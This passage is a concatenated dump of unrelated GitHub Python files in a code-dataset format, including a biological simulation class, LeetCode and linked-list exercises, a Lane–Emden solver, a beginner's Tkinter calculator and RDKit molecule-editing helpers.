default_plots module in the plot_scripts directory\n\n :param parameters_or_file: json file name with plot parameter configuration or dictionary with plot\n parameter configuration\n \"\"\"\n dp.raw_plot(self.results, parameters_or_file)\n\n def __add__(self, other):\n return SimulationComposition(self, other)\n\n def generate_sbml(self):\n \"\"\"\n Generates sbmls strings from the current stored models in the simulation\n\n \"return: to_return (list of str) list of sbml files from all the simulations stored\n \"\"\"\n to_return = []\n if self._species_for_sbml is None:\n self.compile(verbose=False)\n self._assemble_multi_simulation_structure()\n\n for parameter_sweep in self.sbml_data_list:\n for sbml_data in parameter_sweep:\n to_return.append(sbml_builder.build(sbml_data['species_for_sbml'], sbml_data['parameters_for_sbml'],\n sbml_data['reactions_for_sbml'], sbml_data['events_for_sbml']))\n return to_return\n\n @classmethod\n def is_simulation(cls):\n return True\n\n @classmethod\n def set_job_number(cls, params):\n # Run in parallel or sequentially\n # If nothing is specified just run it in parallel\n try:\n if params[\"jobs\"] == 1:\n simlog.debug(\"Running simulation sequentially\")\n jobs = params[\"jobs\"]\n else:\n simlog.debug(\"Running simulation in parallel\")\n jobs = params[\"jobs\"]\n except KeyError:\n simlog.debug(\"Running simulation in parallel\")\n jobs = -1\n return jobs\n\n\nclass SimulationComposition:\n\n def _compile_multi_simulation(self):\n for sim1 in self.list_of_simulations:\n for sim2 in self.list_of_simulations:\n if sim1 == sim2:\n continue\n\n for spe1 in sim1.model:\n for spe2 in sim2.model:\n\n if spe1.get_name() == spe2.get_name():\n if spe1.get_all_characteristics() != spe2.get_all_characteristics():\n simlog.error(f'Species {spe1.get_name()} was modified through simulations. \\n' +\n f'Although reactions can be removed, the characteristics inherited must'\n f'remains the same')\n\n def __init__(self, S1, S2):\n if isinstance(S1, Simulation) and isinstance(S2, Simulation):\n self.list_of_simulations = [S1] + [S2]\n elif isinstance(S1, SimulationComposition) and isinstance(S2, Simulation):\n self.list_of_simulations = S1.list_of_simulations + [S2]\n elif isinstance(S1, Simulation) and isinstance(S2, SimulationComposition):\n self.list_of_simulations = [S1] + S2.list_of_simulations\n elif isinstance(S1, SimulationComposition) and isinstance(S2, SimulationComposition):\n self.list_of_simulations = S1.list_of_simulations + S2.list_of_simulations\n else:\n simlog.error('Simulation compositions can only be performed with other simulations', stack_index=3)\n self.results = None\n self.fres = None\n self.base_sim = self.list_of_simulations[0]\n\n def __add__(self, other):\n return SimulationComposition(self, other)\n\n # FIX THIS\n def __setattr__(self, name, value):\n white_list = ['list_of_simulations', 'results', 'base_sim', 'fres']\n broad_cast_parameters = ['level', 'method', 'volume']\n\n if name == 'duration':\n simlog.error('The durations are to be defined specifically to each simulation and not for the concatenated'\n ' object. \\n'\n 'Please set the durations for each simulation object independently', stack_index=2)\n\n if name in broad_cast_parameters:\n if name == 'volume':\n for sim in self.list_of_simulations:\n if sim.__dict__['parameters'][name] != 1:\n simlog.error('Volumes must be defined only individually for each simulation or once in the '\n 'concatenated simulation', stack_index=2)\n else:\n for sim in self.list_of_simulations:\n sim.__dict__['parameters'][name] = value\n\n if name in white_list:\n self.__dict__[name] = value\n else:\n self.base_sim.__setattr__(name, value)\n\n def __getattr__(self, item):\n if item == 'plot_config':\n self.base_sim.__dict__['plot_flag'] = True\n return self.base_sim\n\n def compile(self, verbose=True):\n str = ''\n for sim in self.list_of_simulations:\n str += sim.compile(verbose)\n\n self._compile_multi_simulation()\n self.base_sim._assemble_multi_simulation_structure()\n if str != '':\n return str\n\n def _check_all_sims_compilation(self):\n\n for sim in self.list_of_simulations:\n if sim._species_for_sbml is None:\n sim.compile(verbose=False)\n\n def run(self):\n\n self._check_all_sims_compilation()\n self._compile_multi_simulation()\n\n multi_parameter_dictionary = {}\n\n for sim in self.list_of_simulations:\n multi_parameter_dictionary = ps.unite_parameter_dictionaries(multi_parameter_dictionary,\n sim.model_parameters)\n\n self.base_sim.model_parameters = multi_parameter_dictionary\n\n for sim in self.list_of_simulations:\n\n if sim == self.base_sim:\n continue\n\n self.base_sim._list_of_models += sim._list_of_models\n self.base_sim._list_of_parameters += sim._list_of_parameters\n\n self.base_sim.run()\n self.results = self.base_sim.results\n self.fres = self.base_sim.fres\n\n def plot_deterministic(self, *species):\n self.base_sim.plot_deterministic(*species)\n\n def plot_stochastic(self, *species):\n self.base_sim.plot_stochastic(*species)\n\n def plot(self, *species):\n self.base_sim.plot(*species)\n\n def plot_raw(self, parameters_or_file):\n self.base_sim.plot_raw(parameters_or_file)\n\n def generate_sbml(self):\n\n self._check_all_sims_compilation()\n self._compile_multi_simulation()\n\n for sim in self.list_of_simulations:\n\n if sim == self.base_sim:\n continue\n\n self.base_sim._list_of_models += sim._list_of_models\n self.base_sim._list_of_parameters += sim._list_of_parameters\n\n return self.base_sim.generate_sbml()\n\n @classmethod\n def is_simulation(cls):\n return True\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"ROBACON/mobspy","sub_path":"mobspy/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":30077,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"71929649925","text":"#Cette fonction retourne le # de séquence Maximale de charactère qui se suit\ndef séquenceMax(liste):\n a=[]\n for i in range(len(liste)):\n a.append(liste.count(liste[i]))\n a=max(a)\n return a\n\n#Prend l'entrer de l'usage\ninp= input(\"Veuillez entrer une liste de valeurs séparées par des virgules: \").split(\",\")\ninp= [int(b) for b in inp]\nprint(séquenceMax(inp))\n","repo_name":"Jean-Markello/Python-Coding","sub_path":"devoir 4/d4q1.py","file_name":"d4q1.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9633236936","text":"\nfrom Tkinter import *\nimport tkColorChooser\nimport tkSimpleDialog\n\nimport Globals\n\nfrom SplineSet import GetTkColor\n\nclass SplineDlgLabels(tkSimpleDialog.Dialog):\n\n def body(self,master):\n \"\"\" define the controls of the widget \"\"\"\n\n frm = Frame(master)\n frm.pack(padx = 3, pady=3)\n\n self.text = StringVar()\n self.text.set(\"default\")\n\n self.btn = Button(frm,\n text=\"Choose Color\",\n command=self.SelectColor)\n self.color = None\n\n def SelectColor(self):\n colorTuple = tkColorChooser.askcolor(color=self.color)\n self.color = colorTuple[0]\n if self.color:\n self.btn.config(bg=GetTkColor(self.color))\n\n def ok(self,event=None):\n\n Globals.objectSet.SetLabel(self.text.get(),\n self.color)\n tkSimpleDialog.Dialog.cancel(self,event)\n\n \n \n","repo_name":"neurodebian/freesurfer","sub_path":"pyScout/SplineDlgLabels.py","file_name":"SplineDlgLabels.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"71860374406","text":"import shutil\nreadPath='Missing_2019-06-26.txt'\nwritePath='fix2.txt'\nlines_seen=set()\noutfiile=open(writePath,'a+')\nf=open(readPath,'r')\nfor line in f:\n if line not in lines_seen:\n outfiile.write(line)\n lines_seen.add(line)\n# --------------------- \n# 作者:TtingZh \n# 来源:CSDN \n# 原文:https://blog.csdn.net/t_zht/article/details/83377165 \n# 版权声明:本文为博主原创文章,转载请附上博文链接!","repo_name":"findpkq/Xanadu_Steam_CN","sub_path":"Tool/去重.py","file_name":"去重.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"8545613443","text":"def Morning() :\r\n \"\"\"\r\n OPERATORS\r\n \r\n Arithmatic operators\r\n -Division /\r\n -Whole number Division //\r\n -Subtraction -\r\n -Modulus %\r\n -Exponemtial **\r\n -Multiplicatino *\r\n \r\n Comparison operators\r\n -Equal to ==\r\n -Not equal to != or !==\r\n -Geater than >\r\n -less than <\r\n -Greater than or equal to >=\r\n -Less than or equal to <=\r\n \r\n Logical operators\r\n -and\r\n -or\r\n -not\r\n \r\n Assignment operators\r\n -Assignment =\r\n -Add and assign +=\r\n -Subtract and assign -=\r\n \r\n Membership operators\r\n -in => checks if value exists in a sequence\r\n -not in => checks if value does not exist in a sequence\r\n \r\n Identity operators\r\n -is => checks similarity\r\n -is not => checks for difference in values\r\n \r\n \"\"\"\r\n #Arithmatic examples\r\n a = 5\r\n b= 10\r\n c=3\r\n print(a+b)\r\n print(a-b)\r\n print(b/c)\r\n print(b//c)\r\n print(b%c)\r\n print(a*c)\r\n print(c**c)\r\n \r\n #Comparison examples\r\n print(a>b) #false\r\n print(a=c) #true\r\n print(a<=c) #false\r\n print(a==b) #false\r\n print(a!=b) #true\r\n \r\n #Logical operators\r\n k = True\r\n l = False\r\n \r\n print(k and k) #true\r\n print(k and l) #false\r\n print(not k) #false\r\n print(k or l) #true\r\n \r\n #Assignment operators\r\n \r\n #subtract and assign\r\n m = 34\r\n m -= 4\r\n print(m) # 30\r\n \r\n #add and assign\r\n o = 34\r\n o += 6\r\n print(o) # 40\r\n \r\n #integer divide and assign\r\n p = 32\r\n p //= 2\r\n print(p) # 16\r\n \r\n #integer divide and assign\r\n p /= 2\r\n print(p) # 8.0\r\n \r\n #modulus and assign\r\n q = 4\r\n q %= 3\r\n print(q) # 1\r\n \r\n #Membership operators\r\n phones =[\"Samsung\",\"Iphone\",\"Blackberry\",\"Nokia\"]\r\n print(\"Nokia\" in phones) #true\r\n print(\"Samsung\" in phones) #true\r\n print(\"OLG\" in phones) #false\r\n print(\"Oppo\" in phones) #false\r\n \r\n #Identity operators\r\n f = \"boy\"\r\n g = \"girl\"\r\n \r\n print( f is g) #false\r\n print( f is not g) #true\r\n \r\n #Bitwise Operators => perform operations on individual bits of binary numbers\r\n # and &\r\n # or ||\r\n #xor ^\r\n #nont ~\r\n #leftshift <<\r\n #rightshift >>\r\n \r\n \r\n \r\n #ASSIGNMENT BUILT A SIMPLE FUNCTIONING CALCULATOR WITH A GUI INTERFACE USING TKINTER (+,-,*,/)\r\n #Title > your name \r\n \r\n \r\n import tkinter as tk\r\n #Defining click handlers\r\n def tap_button(number):\r\n current = entry.get()\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, current + str(number))\r\n\r\n def clear_button():\r\n entry.delete(0, tk.END)\r\n\r\n def equals_button():\r\n expression = entry.get()\r\n try:\r\n result = eval(expression)\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, result)\r\n except Exception:\r\n entry.delete(0, tk.END)\r\n entry.insert(tk.END, \"Arithmetic error\")\r\n \r\n #Supplying title to my program\r\n \r\n window = tk.Tk()\r\n window.title(\"Sendi Joseph\")\r\n\r\n #Creating display window\r\n\r\n entry = tk.Entry(window, width=35, border= 4)\r\n entry.grid(row=0, column=0, columnspan=4)\r\n\r\n #Creating buttons\r\n\r\n button_add = tk.Button(window,border= 3, background=\"coral\", text=\"+\", padx=19, pady=20, command=lambda: tap_button(\"+\"))\r\n button_subtract = tk.Button(window,border= 3, background=\"coral\", text=\"-\", padx=20, pady=20, command=lambda: tap_button(\"-\"))\r\n button_multiply = tk.Button(window,border= 3, background=\"coral\", text=\"*\", padx=20, pady=20, command=lambda: tap_button(\"*\"))\r\n button_divide = tk.Button(window,border= 3, background=\"coral\", text=\"/\", padx=20, pady=20, command=lambda: tap_button(\"/\"))\r\n clear_button = tk.Button(window,border= 3, background=\"red\", text=\"C\", padx=20, pady=20, command=clear_button)\r\n equals_button = tk.Button(window,border= 3, background=\"green\", text=\"=\", padx=20, pady=20, command=equals_button)\r\n\r\n button_1 = tk.Button(window,border= 3, background=\"purple\", text=\"1\", padx=20, pady=20, command=lambda: tap_button(1))\r\n button_2 = tk.Button(window,border= 3, background=\"purple\",text=\"2\", padx=20, pady=20, command=lambda: tap_button(2))\r\n button_3 = tk.Button(window,border= 3, background=\"purple\",text=\"3\", padx=20, pady=20, command=lambda: tap_button(3))\r\n button_4 = tk.Button(window,border= 3, background=\"purple\",text=\"4\", padx=20, pady=20, command=lambda: tap_button(4))\r\n button_5 = tk.Button(window,border= 3, background=\"purple\",text=\"5\", padx=20, pady=20, command=lambda: tap_button(5))\r\n button_6 = tk.Button(window,border= 3, background=\"purple\",text=\"6\", padx=20, pady=20, command=lambda: tap_button(6))\r\n button_7 = tk.Button(window,border= 3, background=\"purple\",text=\"7\", padx=20, pady=20, command=lambda: tap_button(7))\r\n button_8 = tk.Button(window,border= 3, background=\"purple\",text=\"8\", padx=20, pady=20, command=lambda: tap_button(8))\r\n button_9 = tk.Button(window,border= 3, background=\"purple\",text=\"9\", padx=20, pady=20, command=lambda: tap_button(9))\r\n button_0 = tk.Button(window,border= 3, background=\"purple\",text=\"0\", padx=20, pady=20, command=lambda: tap_button(0))\r\n\r\n #Positioning\r\n\r\n button_1.grid(row=1, column=0)\r\n button_2.grid(row=1, column=1)\r\n button_3.grid(row=1, column=2)\r\n button_4.grid(row=2, column=0)\r\n button_5.grid(row=2, column=1)\r\n button_6.grid(row=2, column=2)\r\n button_7.grid(row=3, column=0)\r\n button_8.grid(row=3, column=1)\r\n button_9.grid(row=3, column=2)\r\n button_0.grid(row=4, column=1)\r\n button_add.grid(row=1, column=3)\r\n button_subtract.grid(row=2, column=3)\r\n button_multiply.grid(row=3, column=3)\r\n button_divide.grid(row=4, column=3)\r\n clear_button.grid(row=4, column=0)\r\n equals_button.grid(row=4, column=2)\r\n\r\n # Starting window loop\r\n window.mainloop()\r\n\r\nMorning()\r\n\r\ndef Afternoon() :\r\n pass\r\n\r\n","repo_name":"Masembe0757/My_Recess_files-","sub_path":"RECESS/Day 3/Masembe_Sendi_Joseph_morning.PY","file_name":"Masembe_Sendi_Joseph_morning.PY","file_ext":"py","file_size_in_byte":5988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6940374848","text":"file = open('./17.txt', 'r')\n\nmas = [int(x) for x in file.read().splitlines()]\n\nfile.close()\n\nevenmas = []\n\nfor i in mas:\n if i % 2 == 0:\n evenmas.append(i)\n\nmsum = sum(evenmas) / len(evenmas)\n\nmaxsum = 0\ncounter = 0\n\nfor i in range(0, len(mas)-1):\n a = mas[i]\n b = mas[i+1]\n\n if (a % 3 == 0 or b % 3 == 0) and (a < msum or b < msum):\n counter += 1\n maxsum = max(maxsum, a + b)\n\nprint(counter, maxsum)\n","repo_name":"Aleksey-Danchin/Daito","sub_path":"задачи/17/40733/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32643997318","text":"'''\n623. Add One Row to Tree\n\nGiven the root of a binary tree and two integers val and depth, add a row of nodes with value val at the given depth depth.\n\nNote that the root node is at depth 1.\n\nThe adding rule is:\n\nGiven the integer depth, for each not null tree node cur at the depth depth - 1, create two tree nodes with value val as cur's left subtree root and right subtree root.\ncur's original left subtree should be the left subtree of the new left subtree root.\ncur's original right subtree should be the right subtree of the new right subtree root.\nIf depth == 1 that means there is no depth depth - 1 at all, then create a tree node with value val as the new root of the whole original tree, and the original tree is the new root's left subtree.\n\nExample 1:\n\nInput: root = [4,2,6,3,1,5], val = 1, depth = 2\nOutput: [4,1,1,2,null,null,6,3,1,5]\nExample 2:\n\nInput: root = [4,2,null,3,1], val = 1, depth = 3\nOutput: [4,2,null,1,1,3,null,null,1]\n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 10^4].\nThe depth of the tree is in the range [1, 10^4].\n-100 <= Node.val <= 100\n-10^5 <= val <= 10^5\n1 <= depth <= the depth of tree + 1\n'''\n\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def addOneRow(self, root: Optional[TreeNode], val: int, depth: int) -> Optional[TreeNode]:\n if depth == 1:\n new_root = TreeNode(val=val, left=root)\n return new_root\n \n def add(root, level):\n if not root:\n return\n \n if level == depth-1:\n root.left = TreeNode(val=val, left=root.left)\n root.right = TreeNode(val=val, right=root.right)\n return\n \n add(root.left, level+1)\n add(root.right, level+1)\n \n add(root, 1)\n return root\n ","repo_name":"Chopinsky/algo-problems","sub_path":"challenges/999/623_AddOneRowTree.py","file_name":"623_AddOneRowTree.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"70836486086","text":"class LinkedList:\n def __init__(self, head=None):\n self.head = head\n self.size = 0;\n\n def empty(self):\n if not self.head:\n return true\n return false\n\n def size(self):\n return self.size\n\n def print_list(self):\n current = self.head\n if not current:\n print(\"List is empty\")\n else:\n while current:\n print(\"Node: \", current.value)\n current = current.next\n print()\n return\n\n def insert(self, node):\n if not self.head:\n self.head = node\n self.size += 1\n else:\n current = self.head\n while current.next:\n current = current.next\n current.next = node\n self.size += 1\n\n def insert_beginning(self, node):\n if not self.head:\n self.head = none\n self.size += 1\n else:\n node.next = self.head\n self.head = node\n self.size += 1\n\n def insert_after(self, node, afterNode):\n current = self.head\n\n if current.value == afterNode.value:\n node.next = current.next\n current.next = node\n self.size += 1\n return\n else:\n while current and current.next:\n if current.next.value == afterNode.value:\n node.next = current.next.next\n current.next.next = node\n self.size += 1\n return\n else:\n current = current.next\n\n def remove(self, node):\n #If Node that we are trying to remove it's head\n if self.head and self.head.value == node.value:\n self.head = self.head.next\n self.size -= 1\n else:\n current = self.head\n while current and current.next:\n if current.next.value == node.value:\n current.next = current.next.next\n self.size -= 1\n return\n else:\n current = current.next\n\n def pop(self):\n current = self.head\n if current and not current.next:\n self.head = None\n self.size = 0\n return\n else:\n while current and current.next:\n if not current.next.next:\n current.next = None\n self.size -= 1\n return\n else:\n current = current.next\n\n\n","repo_name":"alejandro-mr/data-structures-practice","sub_path":"python/linked_list/singly_linked_list/SinglyLinkedList.py","file_name":"SinglyLinkedList.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41471649228","text":"#!/usr/bin/env python3\n#==============================================================================\n# resolution_study.py\n#\n# Compute and save the absolute differences of the polytropic parameters ξ₁ and\n# θₙ'(ξ₁) of the Lane--Emden equataion with their analytic solutions given by \n# Hansen, Kawaler & Trimble (2004, Table 7.1).\n#\n# Author: Stanley A. Baronett\n# Created: 2022-12-08\n# Updated: 2022-12-09\n#==============================================================================\nimport numpy as np\nimport shooting_method as sm\nimport sys\n\nns = np.asarray([0, 1]) # polytropic indices\nh_min, h_max, num = 1e-6, 1e-2, 200\nhs = np.geomspace(h_min, h_max, num=num) # range of step sizes\nanalytics = [[np.sqrt(6), -np.sqrt(6)/3], # analytic solutions\n [np.pi, -1/np.pi ]]\ndxs = np.zeros((len(ns), num)) # to store δξ₁\ndzs = np.zeros((len(ns), num)) # to store δθₙ'(ξ₁)\n\nprint(\"Computing and storing δξ₁ and δθₙ'(ξ₁) for...\", flush=True)\nfor i, n in enumerate(ns):\n xs, zs = np.zeros(num), np.zeros(num) # to store ξ₁ and θₙ'(ξ₁)\n\n print(f' n = {n}...', flush=True)\n\n for j, h in enumerate(hs):\n x = 1e-16 # ξ\n y = sm.yfunc(x, n) # θₙ\n z = sm.zfunc(x, n) # θₙ' = dθₙ/dξ = dy/dx\n\n while y.real > 0:\n x, y, z = sm.rk4(n, x, y, z, h)\n \n xs[j], zs[j] = x, z.real\n sys.stdout.write(f'\\r {(j+1)/hs.size:.1%}')\n\n dxs[i][:] = np.abs(np.asarray(xs) - analytics[i][0])\n dzs[i][:] = np.abs(np.asarray(zs) - analytics[i][1])\n print(' Done.', flush=True)\n\nprint(\"Saving results for plotting in 'fig1.py'...\", flush=True)\nnp.savez_compressed('../npz/resolution_study', ns=ns, hs=hs, dxs=dxs, dzs=dzs)\nprint('Finished.', flush=True)\n","repo_name":"sabaronett/ast-731","sub_path":"py/resolution_study.py","file_name":"resolution_study.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31646055762","text":"import matplotlib as mpl\nmpl.rcParams['font.sans-serif'] = [\n 'Roboto Condensed', 'Roboto Condensed Regular'\n]\n\nimport seaborn as sns\nimport math\nimport rdkit\nimport itertools\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import rdDepictor\nfrom rdkit.Chem.Draw import rdMolDraw2D\nfrom rdkit.Chem import AllChem, Draw, Descriptors, QED\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy.optimize import leastsq\nfrom scipy import interpolate\nimport cairosvg as cs\n\n\ndef get_valid_actions(state, atom_types, allow_removal, allow_no_modification,\n allowed_ring_sizes, allow_bonds_between_rings):\n \"\"\"Computes the set of valid actions for a given state.\n\n Args:\n state: String SMILES; the current state. If None or the empty string, we\n assume an \"empty\" state with no atoms or bonds.\n atom_types: Set of string atom types, e.g. {'C', 'O'}.\n allow_removal: Boolean whether to allow actions that remove atoms and bonds.\n allow_no_modification: Boolean whether to include a \"no-op\" action.\n allowed_ring_sizes: Set of integer allowed ring sizes; used to remove some\n actions that would create rings with disallowed sizes.\n allow_bonds_between_rings: Boolean whether to allow actions that add bonds\n between atoms that are both in rings.\n\n Returns:\n Set of RDKit Mol containing the valid actions (technically, the set of\n all states that are acceptable from the given state).\n\n Raises:\n ValueError: If state does not represent a valid molecule.\n \"\"\"\n if not state:\n # Available actions are adding a node of each type.\n return copy.deepcopy(atom_types)\n mol = Chem.MolFromSmiles(state)\n if mol is None:\n raise ValueError('Received invalid state: %s' % state)\n # atom_valences = dict(\n # #zip(sorted(atom_types), molecules.atom_valences(sorted(atom_types))))\n # zip(sorted(atom_types), molecules_py.atom_valences(sorted(atom_types))))\n atom_valences = {'C': 4, 'H': 1, 'O': 2, 'N': 3}\n atoms_with_free_valence = {\n i: [\n atom.GetIdx()\n for atom in mol.GetAtoms()\n # Only atoms that allow us to replace at least one H with a new bond\n # are enumerated here.\n if atom.GetNumImplicitHs() >= i\n ] for i in range(1, max(atom_valences.values()))\n }\n valid_actions = set()\n valid_actions.update(\n _atom_addition(\n mol,\n atom_types=atom_types,\n atom_valences=atom_valences,\n atoms_with_free_valence=atoms_with_free_valence))\n valid_actions.update(\n _bond_addition(\n mol,\n atoms_with_free_valence=atoms_with_free_valence,\n allowed_ring_sizes=allowed_ring_sizes,\n allow_bonds_between_rings=allow_bonds_between_rings))\n if allow_removal:\n valid_actions.update(_bond_removal(mol))\n if allow_no_modification:\n #valid_actions.add(Chem.MolToSmiles(mol))\n valid_actions.add(Chem.Mol(mol))\n return valid_actions\n\n\ndef _atom_addition(state, atom_types, atom_valences, atoms_with_free_valence):\n \"\"\"Computes valid actions that involve adding atoms to the graph.\n\n Actions:\n * Add atom (with a bond connecting it to the existing graph)\n\n Each added atom is connected to the graph by a bond. There is a separate\n action for connecting to (a) each existing atom with (b) each valence-allowed\n bond type. Note that the connecting bond is only of type single, double, or\n triple (no aromatic bonds are added).\n\n For example, if an existing carbon atom has two empty valence positions and\n the available atom types are {'C', 'O'}, this section will produce new states\n where the existing carbon is connected to (1) another carbon by a double bond,\n (2) another carbon by a single bond, (3) an oxygen by a double bond, and\n (4) an oxygen by a single bond.\n\n Args:\n state: RDKit Mol.\n atom_types: Set of string atoms.\n atom_valences: Dict mapping string atom types to integer valences.\n atoms_with_free_valence: Dict mapping integer minimum available valence\n values to lists of integer atom indices. For instance, all atom indices in\n atoms_with_free_valence[2] have at least two available valence positions.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_order = {\n 1: Chem.BondType.SINGLE,\n 2: Chem.BondType.DOUBLE,\n 3: Chem.BondType.TRIPLE,\n }\n atom_addition = set()\n for i in range(1, max(atom_valences.values())):\n if i not in bond_order:\n continue # Skip valences that are too high.\n for atom in atoms_with_free_valence[i]:\n for element in atom_types:\n if atom_valences[element] >= i:\n new_state = Chem.RWMol(state)\n idx = new_state.AddAtom(Chem.Atom(element))\n new_state.AddBond(atom, idx, bond_order[i])\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #atom_addition.add(Chem.MolToSmiles(new_state))\n atom_addition.add(new_state)\n return atom_addition\n\n\ndef _bond_addition(state, atoms_with_free_valence, allowed_ring_sizes,\n allow_bonds_between_rings):\n \"\"\"Computes valid actions that involve adding bonds to the graph.\n\n Actions (where allowed):\n * None->{single,double,triple}\n * single->{double,triple}\n * double->{triple}\n\n Note that aromatic bonds are not modified.\n\n Args:\n state: RDKit Mol.\n atoms_with_free_valence: Dict mapping integer minimum available valence\n values to lists of integer atom indices. For instance, all atom indices in\n atoms_with_free_valence[2] have at least two available valence positions.\n allowed_ring_sizes: Set of integer allowed ring sizes; used to remove some\n actions that would create rings with disallowed sizes.\n allow_bonds_between_rings: Boolean whether to allow actions that add bonds\n between atoms that are both in rings.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_orders = [\n None,\n Chem.BondType.SINGLE,\n Chem.BondType.DOUBLE,\n Chem.BondType.TRIPLE,\n ]\n bond_addition = set()\n for valence, atoms in atoms_with_free_valence.items():\n if valence > 3:\n continue # Skip valences that are too high.\n for atom1, atom2 in itertools.combinations(atoms, 2):\n # Get the bond from a copy of the molecule so that SetBondType() doesn't\n # modify the original state.\n bond = Chem.Mol(state).GetBondBetweenAtoms(atom1, atom2)\n new_state = Chem.RWMol(state)\n # Kekulize the new state to avoid sanitization errors; note that bonds\n # that are aromatic in the original state are not modified (this is\n # enforced by getting the bond from the original state with\n # GetBondBetweenAtoms()).\n Chem.Kekulize(new_state, clearAromaticFlags=True)\n if bond is not None:\n if bond.GetBondType() not in bond_orders:\n continue # Skip aromatic bonds.\n idx = bond.GetIdx()\n # Compute the new bond order as an offset from the current bond order.\n bond_order = bond_orders.index(bond.GetBondType())\n bond_order += valence\n if bond_order < len(bond_orders):\n idx = bond.GetIdx()\n bond.SetBondType(bond_orders[bond_order])\n new_state.ReplaceBond(idx, bond)\n else:\n continue\n # If do not allow new bonds between atoms already in rings.\n elif (not allow_bonds_between_rings and\n (state.GetAtomWithIdx(atom1).IsInRing() and\n state.GetAtomWithIdx(atom2).IsInRing())):\n continue\n # If the distance between the current two atoms is not in the\n # allowed ring sizes\n elif (allowed_ring_sizes is not None and\n len(Chem.rdmolops.GetShortestPath(\n state, atom1, atom2)) not in allowed_ring_sizes):\n continue\n else:\n new_state.AddBond(atom1, atom2, bond_orders[valence])\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #bond_addition.add(Chem.MolToSmiles(new_state))\n bond_addition.add(new_state)\n return bond_addition\n\n\ndef _bond_removal(state):\n \"\"\"Computes valid actions that involve removing bonds from the graph.\n\n Actions (where allowed):\n * triple->{double,single,None}\n * double->{single,None}\n * single->{None}\n\n Bonds are only removed (single->None) if the resulting graph has zero or one\n disconnected atom(s); the creation of multi-atom disconnected fragments is not\n allowed. Note that aromatic bonds are not modified.\n\n Args:\n state: RDKit Mol.\n\n Returns:\n Set of RDKit Mol; the available actions.\n \"\"\"\n bond_orders = [\n None,\n Chem.BondType.SINGLE,\n Chem.BondType.DOUBLE,\n Chem.BondType.TRIPLE,\n ]\n bond_removal = set()\n for valence in [1, 2, 3]:\n for bond in state.GetBonds():\n # Get the bond from a copy of the molecule so that SetBondType() doesn't\n # modify the original state.\n bond = Chem.Mol(state).GetBondBetweenAtoms(bond.GetBeginAtomIdx(),\n bond.GetEndAtomIdx())\n if bond.GetBondType() not in bond_orders:\n continue # Skip aromatic bonds.\n new_state = Chem.RWMol(state)\n # Kekulize the new state to avoid sanitization errors; note that bonds\n # that are aromatic in the original state are not modified (this is\n # enforced by getting the bond from the original state with\n # GetBondBetweenAtoms()).\n Chem.Kekulize(new_state, clearAromaticFlags=True)\n # Compute the new bond order as an offset from the current bond order.\n bond_order = bond_orders.index(bond.GetBondType())\n bond_order -= valence\n if bond_order > 0: # Downgrade this bond.\n idx = bond.GetIdx()\n bond.SetBondType(bond_orders[bond_order])\n new_state.ReplaceBond(idx, bond)\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n #bond_removal.add(Chem.MolToSmiles(new_state))\n bond_removal.add(new_state)\n elif bond_order == 0: # Remove this bond entirely.\n atom1 = bond.GetBeginAtom().GetIdx()\n atom2 = bond.GetEndAtom().GetIdx()\n new_state.RemoveBond(atom1, atom2)\n sanitization_result = Chem.SanitizeMol(new_state, catchErrors=True)\n if sanitization_result:\n continue # Skip the molecule when sanitization fails.\n smiles = Chem.MolToSmiles(new_state)\n parts = sorted(smiles.split('.'), key=len)\n # We define the valid bond removing action set as the actions\n # that remove an existing bond, generating only one independent\n # molecule, or a molecule and an atom.\n if len(parts) == 1 or len(parts[0]) == 1:\n #bond_removal.add(parts[-1])\n bond_removal.add(Chem.MolFromSmiles(parts[-1]))\n return bond_removal\n\n\ndef highlights_diff(original_mol, next_mol):\n highlight_atoms = []\n original_num_atoms = len(original_mol.GetAtoms())\n next_num_atoms = len(next_mol.GetAtoms())\n for i in range(min(original_num_atoms, next_num_atoms)):\n if original_mol.GetAtoms()[i].GetSymbol() != next_mol.GetAtoms(\n )[i].GetSymbol():\n highlight_atoms.append(next_mol.GetAtoms()[i].GetIdx())\n if next_num_atoms > original_num_atoms:\n highlight_atoms.extend(range(original_num_atoms, next_num_atoms))\n\n highlight_bonds = []\n original_num_bonds = len(original_mol.GetBonds())\n next_num_bonds = len(next_mol.GetBonds())\n for i in range(min(original_num_bonds, next_num_bonds)):\n if 